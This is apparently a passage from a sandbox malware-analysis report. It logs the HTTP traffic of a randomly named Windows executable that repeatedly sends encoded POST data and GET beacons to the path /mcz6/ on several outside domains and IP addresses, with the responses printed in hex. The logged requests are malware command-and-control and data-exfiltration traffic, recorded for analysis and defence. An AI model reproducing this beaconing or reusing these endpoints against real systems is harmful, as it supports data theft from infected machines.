                                                    Data Ascii: 1Joh=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXAzSJHbs1A0xNeyaFGF5/yahObCiG
                                                    May 16, 2024 17:19:20.155518055 CEST | 345 | IN | HTTP/1.1 308 Permanent Redirect
                                                    Date: Thu, 16 May 2024 15:19:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 164
                                                    Connection: close
                                                    Location: https://www.allinone24.shop/mcz6
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.9 | 49720 | 57.151.38.169 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:21.898890018 CEST | 762 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 68 70 63 6c 72 75 54 4a 42 4d 46 71 44 32 72 78 55 6c 53 35 69 43 41 35 58 59 68 77 3d 3d
                                                    Data Ascii: 1Joh=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknNhpclruTJBMFqD2rxUlS5iCA5XYhw==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.9 | 49721 | 57.151.38.169 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:24.486053944 CEST | 1775 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 33 4a 2b 55 69 62 2f 42 30 55 51 38 2b 78 59 62 6e 66 54 63 2b 4e 32 4c 61 36 4c 2f 55 4d 33 45 59 6e 7a 45 59 75 4d 2b 74 63 6a 6f 31 31 4a 72 56 46 33 68 43 4d 77 45 65 65 78 39 47 6b 6d 39 45 43 48 78 75 6f 4e 57 39 59 47 73 62 6c 62 63 75 78 63 68 69 63 70 7a 51 57 67 70 68 6b 6a 76 57 58 55 61 34 49 39 34 64 44 2b 52 6b 79 6f 77 4f 6e 54 62 55 2f 39 36 48 4b 44 33 4d 46 75 52 53 2f 4b 4c 6d 79 4d 54 61 32 71 54 34 65 52 70 6d 4d 56 5a 66 67 4d 73 56 38 49 52 44 74 57 4b 50 31 75 53 [TRUNCATED]
                                                     Data Ascii: 1Joh= [TRUNCATED]


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     8 | 192.168.2.9 | 49722 | 57.151.38.169 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:27.047625065 CEST | 475 | OUT | GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                     May 16, 2024 17:19:29.256321907 CEST | 488 | IN | HTTP/1.1 308 Permanent Redirect
                                                    Date: Thu, 16 May 2024 15:19:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 164
                                                    Connection: close
                                                    Location: https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw==
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     9 | 192.168.2.9 | 49723 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:34.590842962 CEST | 732 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4b 56 61 53 6b 48 6c 75 38 33 50 4c 61 58 2b 64 56 55 47 57 72 63 4b 72 4e 71 67 71
                                                    Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
                                                     May 16, 2024 17:19:35.267997980 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     10 | 192.168.2.9 | 49724 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:37.117289066 CEST | 756 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 4b 4d 4b 4e 70 43 63 55 4e 32 62 37 57 67 61 47 74 48 68 66 45 68 58 45 43 52 37 77 3d 3d
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LKMKNpCcUN2b7WgaGtHhfEhXECR7w==


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     11 | 192.168.2.9 | 49725 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:39.655404091 CEST | 1769 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 57 73 64 42 32 66 52 6d 57 57 36 4b 79 39 4c 4e 4a 55 59 77 73 56 56 35 76 30 44 6d 31 69 30 74 70 78 55 6c 58 6e 6a 71 42 72 4d 38 44 53 67 48 5a 36 77 39 63 39 44 4d 50 72 41 2b 54 4d 30 66 42 57 79 33 76 46 6f 4b 6e 49 38 73 6d 45 36 35 64 72 74 6e 38 2b 49 70 61 38 7a 54 4a 41 75 52 4a 2f 58 7a 32 54 75 49 2b 42 58 39 62 55 4f 31 59 32 43 57 4a 63 33 69 75 58 61 62 2f 79 4e 67 4a 4e 4a 68 47 45 7a 70 77 4f 34 48 34 36 75 49 36 4b 2f 46 5a 57 66 31 32 64 56 76 6a 52 38 4b 66 57 47 [TRUNCATED]
                                                     Data Ascii: 1Joh= [TRUNCATED]
                                                     May 16, 2024 17:19:40.897634983 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:40 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     12 | 192.168.2.9 | 49726 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:42.203634977 CEST | 473 | OUT | GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                     May 16, 2024 17:19:43.052234888 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:42 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     13 | 192.168.2.9 | 49727 | 217.160.0.111 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:48.469305038 CEST | 732 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4e 62 45 38 56 56 65 51 73 41 70 76 48 6c 35 75 76 6e 39 64 69 5a 78 70 34 6e 66 30 50 48 37 5a 52 65 56 68 59 79 79 61 43 32 62 52 38 4b 2f 4d 5a 64 49 39 47 77 59 6a 43 6f 30 77 38 32 45 72 6c 55 48 65 4e 4c 7a 50 58 47 30 36 48 66 39 72 66 79 6d 46 62 34 32 61 69 6e 62 57 56 61 76 45 4d 71 32 72 4d 47 31 70 70 42 64 30 37 51 49 43 50 4f 63 62 63 75 75 42 6c 7a 71 67 71 6c 39 72 71 70 34 45 70 36 30 45 6c 67 52 37 71 37 30 4e 43 58 76 4c 67 70 76 36 71 6a 71 51 37 39 2f 43 52 38 46 34 57 51 63 51 77 6f 6b 66 31 37 62 59
                                                    Data Ascii: 1Joh=g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9rqp4Ep60ElgR7q70NCXvLgpv6qjqQ79/CR8F4WQcQwokf17bY
                                                     May 16, 2024 17:19:49.188283920 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Thu, 16 May 2024 15:19:49 GMT
                                                    Server: Apache
                                                    Content-Encoding: gzip
                                                    Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                    Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
